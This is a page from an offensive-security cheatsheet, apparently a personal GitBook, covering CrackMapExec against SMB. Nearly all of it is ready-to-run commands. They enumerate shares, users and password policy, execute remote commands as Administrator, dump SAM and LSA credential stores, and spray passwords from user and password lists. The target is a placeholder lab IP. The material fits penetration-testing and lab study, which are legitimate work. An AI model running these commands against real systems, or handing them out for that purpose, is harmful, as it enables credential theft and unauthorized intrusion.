Cheatsheet
  • Documentation
  • Nmap
  • Ffuf
  • FTP
  • SMB
  • RPC
  • NFS
  • DNS
  • SMTP
  • IMAP / POP3
  • SNMP
  • SQL
  • Rsync
  • Certipy
  • CrackMapExec
  • Transferring Files
  • Windows Remote Management
  • Windows AV
  • Wordpress
  • Infrastructure Enumeration
  • Privilege Escalation
  • Docker Breakout
  • Shells
  • SSTI
  • XSS
  • Pivot
    • SSH Tunneling
    • Chisel
    • Ligolo-ng
    • Meterpreter
  • LDAP
  • Spray
  • Antivirus / EDR
  • Impacket
  • Bloodhound
  • Powershell
  • Kerberosting
  • Password Attacks
  • Command Injections
  • Sliver C2
  • Windows credentials
  • Windows persistance
  • VSCode Debug
Powered by GitBook
On this page
  • Usage
  • Authentication

CrackMapExec

{smb,ftp,ssh,rdp,ldap,mssql,winrm}
    smb                 own stuff using SMB
    ftp                 own stuff using FTP
    ssh                 own stuff using SSH
    rdp                 own stuff using RDP
    ldap                own stuff using LDAP
    mssql               own stuff using MSSQL
    winrm               own stuff using WINRM

Usage

cme smb 10.10.10.10
cme smb 10.10.10.10 -u 'qu35t' -p 'Passw0rd!' --shares
cme smb 10.10.10.10 -u 'qu35t' -p 'Passw0rd!' --shares -M spider_plus
cme smb 10.10.10.10 --pass-pol
cme smb 10.10.10.10 -u qu35t -p 'Password1!' --users
cme smb 10.10.10.10 -u qu35t -p 'Password1!' --groups
cme smb 10.10.10.10 -u qu35t -p 'Password1!' --loggedon-users
cme smb 10.10.10.10 -u Administrator -p 'Password1!' -x whoami
cme smb 10.10.10.10 -u Administrator -p 'Password1!' --sam
cme smb 10.10.10.10 -u Administrator -p 'Password1!' --lsa

Authentication

cme smb 10.10.10.10 -u '' -p ''
cme smb 10.10.10.10 -u users.txt -p 'Passw0rd!' --continue-on-success
cme smb 10.10.10.10 -u 'qu35t' -p passwords.txt --continue-on-success
PreviousCertipyNextTransferring Files

Last updated 2 years ago